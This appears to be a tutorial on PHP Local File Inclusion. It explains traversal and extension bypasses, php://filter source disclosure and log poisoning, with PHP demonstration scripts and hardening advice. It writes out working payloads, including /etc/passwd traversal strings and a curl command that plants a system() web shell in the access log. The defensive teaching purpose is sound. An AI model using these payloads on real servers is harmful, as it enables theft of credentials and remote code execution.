1. Local File Inclusion (LFI)

Key Takeaways: Local File Inclusion (LFI) Attacks

Basic LFI

  • The application passes a request parameter straight into an include-style call.

  • Example:

    // Directly includes whatever file the user names
    include($_GET['language']);

  • Any file the web server's user can read is retrievable by name (?language=/etc/passwd). Because it is include() rather than a plain read, a file that contains PHP is executed, not just displayed.

Path Traversal

  • When the application prepends a directory, the parameter can still leave it with relative path segments (../).

  • Example:

    // Vulnerable: the prefix fixes the starting directory, not the final path
    include("./languages/" . $_GET['language']);

  • A value such as ../../../../etc/passwd walks back to the filesystem root. Extra ../ segments beyond / are ignored, so overshooting the number of parent directories costs the attacker nothing.

Filename Prefix Handling

  • Some applications prepend a string to the filename itself rather than a directory.

  • Example:

    // Vulnerable: the prefix becomes part of the first path segment
    include("lang_" . $_GET['language']);

  • Starting the value with / turns the prefix into a directory name: lang_/../../../../etc/passwd. This may fail when no directory named lang_ exists, since the .. has to be walked through it, so the trick is not guaranteed to work.

Appended Extensions Bypass

  • Some implementations append an extension such as .php to whatever the user supplies.

  • Example:

    // Vulnerable: ../../etc/passwd becomes ../../etc/passwd.php and fails to open
    include($_GET['language'] . ".php");

  • Known bypasses are a null byte (%00) that truncates the string in old PHP releases, and php://filter, where the appended .php simply completes the resource name (resource=config yields config.php) and the file's source comes back encoded instead of executed. Both are discussed below.
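The following is an added example, not code from the original page: a small simulator that shows what path each of the vulnerable include patterns above actually ends up opening for a given ?language= value, including the old-PHP null-byte truncation. The web root /var/www/html and the payloads are constructed for the demonstration, and the code assumes PHP 8.

```php
<?php
declare(strict_types=1);

/*
 * Added example (not from the original page). Simulates how each vulnerable
 * include() pattern turns an attacker-supplied ?language= value into a path.
 * Web root and payloads are constructed for this demonstration.
 */

/** Collapse "." and ".." segments lexically, the way a path lookup walks them. */
function normalize_path(string $path): string
{
    $segments = [];
    foreach (explode('/', $path) as $segment) {
        if ($segment === '' || $segment === '.') {
            continue;
        }
        if ($segment === '..') {
            array_pop($segments);   // ".." above "/" is ignored: overshooting is harmless
            continue;
        }
        $segments[] = $segment;
    }
    return '/' . implode('/', $segments);
}

/**
 * Build the string the application hands to include() and resolve it against the
 * web root. $legacy mimics PHP < 5.3.4, which stopped at the first null byte.
 */
function simulated_include(string $pattern, string $rawParam, string $webRoot, bool $legacy = false): string
{
    $param = urldecode($rawParam);          // $_GET is already URL-decoded when PHP reads it
    $path = str_replace('{p}', $param, $pattern);

    if (str_contains($path, "\0")) {
        if (!$legacy) {
            return 'rejected: path contains a null byte';
        }
        $path = strstr($path, "\0", true);  // old PHP: the C library never saw the rest
    }
    $absolute = str_starts_with($path, '/') ? $path : $webRoot . '/' . $path;
    return normalize_path($absolute);
}

const WEB_ROOT = '/var/www/html';   // assumed web root

// pattern of the vulnerable include, attacker value, whether to emulate old PHP
$cases = [
    ['{p}',             '/etc/passwd',               false],
    ['./languages/{p}', '../../../../etc/passwd',    false],
    ['lang_{p}',        '/../../../../etc/passwd',   false], // on a real filesystem lang_ must exist as a directory
    ['{p}.php',         '../../../../etc/passwd%00', true],  // works only on PHP < 5.3.4
    ['{p}.php',         '../../../../etc/passwd%00', false], // modern PHP rejects the null byte
];

foreach ($cases as [$pattern, $param, $legacy]) {
    printf("%-18s %-28s %s-> %s\n",
        $pattern, $param, $legacy ? '(old PHP) ' : '',
        simulated_include($pattern, $param, WEB_ROOT, $legacy));
}
```

The first three cases all resolve to /etc/passwd, which is why the number of ../ segments does not have to be exact. The lexical normaliser cannot tell whether lang_ exists, so the prefix case is reported as resolving even though a real filesystem may refuse it; the last two cases show the same payload succeeding on old PHP and being rejected on current releases.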

Second-Order LFI

  • The included path comes from data the attacker planted earlier (a database row, a profile field, an uploaded filename) rather than from the current request.

  • Example:

    // A username stored at registration is later used as an include path
    $username = getUsernameFromDB($_GET['id']);
    include($username);

  • Registering with a username such as ../../../../etc/passwd plants the payload; the request that later triggers it looks harmless and carries no traversal characters. Every value that reaches a file operation needs validation, not only the parameters of the current request.

Platform Agnostic Nature

  • Traversal and the prefix/extension bypasses apply to any language or framework that builds a file path from user input (Node.js fs.readFile, Java File, Python open, and so on). The PHP-specific parts are null-byte truncation, the php:// wrappers, and the fact that include() executes what it loads; in other stacks the same bug is usually an arbitrary file read rather than code execution.


Additional Considerations

Null Byte Injection (Older PHP)

  • PHP before 5.3.4 handed strings to the C filesystem API, which stops at the first null byte, so a %00 in the URL truncated the filename and discarded anything the application appended after it.

  • Example (the null byte is sent in the request, not written in the PHP source):

    // Server code
    include($_GET['language'] . ".php");
    // Request: ?language=../../../../etc/passwd%00
    // Old PHP opened "../../../../etc/passwd"; the ".php" after the null byte was never seen

  • PHP 5.3.4 and later reject paths that contain a null byte, so the include fails instead of being truncated.

PHP Wrappers and Filters

  • The php://filter wrapper applies a stream filter while the file is read. With convert.base64-encode the include receives the file's source as base64 text instead of executable PHP, so the response contains the source of any .php file the server can read; configuration files holding database credentials are the usual target.

  • Example:

    // Returns the base64-encoded source of index.php instead of executing it
    include("php://filter/convert.base64-encode/resource=index.php");

  • As a URL: ?language=php://filter/read=convert.base64-encode/resource=config. This works even when the application appends .php, because the extension just completes the resource name; decode the result with base64 -d. Wrappers that turn an include into code execution (data://, php://input) require allow_url_include=On, which is off by default.

Log File Poisoning

  • Attackers write PHP code into a file the server keeps appending to, most commonly the web server's access log via the User-Agent header (curl -A "<?php system(\$_GET['cmd']); ?>" http://target/), and then include that log through the LFI. include() executes any <?php ... ?> block it finds, whatever log text surrounds it.

  • This is a standard route from LFI to Remote Code Execution (RCE). It requires the log to be readable by the web server's user (on Debian-based systems /var/log/apache2/access.log is not readable by www-data by default), the payload must avoid characters the logger escapes (Apache escapes double quotes and backslashes, so keep single quotes inside the PHP code), and a malformed payload stays in the log and breaks every later include of it.
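The following is an added example, not code from the original page: it reproduces the server side of log poisoning locally by writing an Apache-style access log line whose User-Agent field contains PHP, then passing the file to include(). The client IP, timestamp and payload are constructed for the demonstration, the payload only echoes a string so the script is safe to run, and the code assumes PHP 8.

```php
<?php
declare(strict_types=1);

/*
 * Added example (not from the original page). Shows why including a poisoned
 * access log executes code. IP, timestamp and payload are constructed; a real
 * attacker would send something like
 *     curl -A "<?php system(\$_GET['cmd']); ?>" http://target/
 * and then include the log with &cmd=id appended to the LFI request.
 */

/** Produce an Apache "combined" format log entry for a request with this User-Agent. */
function access_log_line(string $userAgent): string
{
    // Apache escapes double quotes and backslashes in logged fields, which is
    // why working payloads use single quotes inside the PHP code.
    $escaped = addcslashes($userAgent, "\"\\");
    return sprintf('%s - - [%s] "GET / HTTP/1.1" 200 612 "-" "%s"',
        '10.10.14.5', '10/Oct/2023:13:55:36 +0000', $escaped);
}

/*
 * The server side of the attack: the log line is written to disk and the file is
 * then passed to include(), exactly as the vulnerable parameter would do. include()
 * treats the file as a PHP template, so the surrounding log text is echoed verbatim
 * and every <?php ... ?> block inside it is executed.
 */
function include_poisoned_log(string $logLine): string
{
    $log = tempnam(sys_get_temp_dir(), 'access_log_');
    file_put_contents($log, $logLine . "\n");
    ob_start();
    include $log;
    $output = ob_get_clean();
    unlink($log);
    return $output;
}

$benignPayload = "<?php echo 'PAYLOAD-EXECUTED on ' . php_uname('s'); ?>";
$line = access_log_line($benignPayload);
echo "Log entry : $line\n";
echo "Included  : " . include_poisoned_log($line) . "\n";

/*
 * A payload written with double quotes would be logged as \"cmd\", which is a PHP
 * parse error. The broken entry stays in the log, so every later include of the
 * file fails too: test the payload syntax before sending it.
 */
```

The second output line contains the log entry with the User-Agent field replaced by the payload's output, which is what an attacker sees in the page after including the real log; with the system() variant the same position holds the command output.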

Error Handling

  • PHP's include warning echoes the full string that was passed to include(), exposing the prefix and extension the application adds and the include_path, while other errors and stack traces leak absolute script paths. That is exactly what an attacker needs to craft the bypasses above.

  • Set display_errors=Off in production and log errors server-side instead.

Input Sanitization

  • Never build an include path from raw user input. Map the parameter to a fixed set of known files (an allowlist of values, not of characters) and, as a second layer, resolve the final path with realpath() and confirm it still lies inside the intended directory before including it.

  • Stripping characters is the weak option: a non-recursive removal of ../ is defeated by ....//, and a filter applied before URL decoding is defeated by ..%2f or double encoding.
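The following is an added example, not code from the original page: the vulnerable directory-prefix pattern from the page next to the two hardening layers just described, an allowlist mapping and a realpath() containment check. The languages directory, its contents and the allowlist are assumptions made for this demonstration; the script creates them in a temporary directory so it can be run as-is, and it assumes PHP 8.

```php
<?php
declare(strict_types=1);

/*
 * Added example (not from the original page). Vulnerable include next to an
 * allowlist and a realpath() containment check. Directory layout, file contents
 * and the allowlist are assumptions for this demonstration.
 */

/** Vulnerable: the user controls the path and "../" walks out of the directory. */
function include_language_vulnerable(string $dir, string $lang): void
{
    include $dir . '/' . $lang . '.php';
}

/** Layer 1: the parameter selects from a fixed map; the value itself never touches the path. */
const LANGUAGES = ['en' => 'en.php', 'es' => 'es.php'];

function language_file(string $lang): ?string
{
    return LANGUAGES[$lang] ?? null;   // unknown value: the caller falls back to a default
}

/*
 * Layer 2 (defence in depth, or where the file set is not fixed): resolve the
 * candidate with realpath(), which follows symlinks and collapses "..", then
 * require the result to lie under the intended directory.
 */
function safe_language_path(string $dir, string $lang): ?string
{
    if ($lang === '' || str_contains($lang, "\0")) {
        return null;
    }
    $base = realpath($dir);
    $candidate = realpath($dir . '/' . $lang . '.php');
    if ($base === false || $candidate === false) {
        return null;                                        // missing file or directory
    }
    if (!str_starts_with($candidate, $base . DIRECTORY_SEPARATOR)) {
        return null;                                        // resolved outside the directory
    }
    return $candidate;
}

// Demonstration on a throwaway directory tree (constructed for the example).
$dir = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir($dir . '/languages', 0700, true);
file_put_contents($dir . '/languages/en.php', "<?php echo 'hello from en.php';\n");
file_put_contents($dir . '/config.php', "<?php echo 'db_password=hunter2';\n");

foreach (['en', '../config', '../../../../etc/passwd'] as $lang) {
    printf("%-24s allowlist=%-7s realpath check=%s\n",
        $lang,
        language_file($lang) ?? 'reject',
        safe_language_path($dir . '/languages', $lang) === null ? 'reject' : 'ok');
}

// The vulnerable version happily executes the file outside the directory.
ob_start();
include_language_vulnerable($dir . '/languages', '../config');
$leaked = ob_get_clean();
echo "vulnerable include of '../config' printed: $leaked\n";

unlink($dir . '/languages/en.php');
unlink($dir . '/config.php');
rmdir($dir . '/languages');
rmdir($dir);
```

Only en passes both layers; ../config is rejected by the allowlist and, because it resolves to an existing file outside the languages directory, by the realpath() check as well, while the vulnerable function prints the contents of config.php. Pair the code-level fix with php.ini: allow_url_include=Off (the default) and an open_basedir limiting which directories PHP may open.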

Security Headers

  • Security headers (Content-Security-Policy, X-Frame-Options, Strict-Transport-Security) govern browser behaviour and do not prevent server-side file inclusion. The server-side equivalents of an extra layer are allow_url_include=Off, an open_basedir restriction, and file permissions that keep logs and configuration unreadable by the web server account.
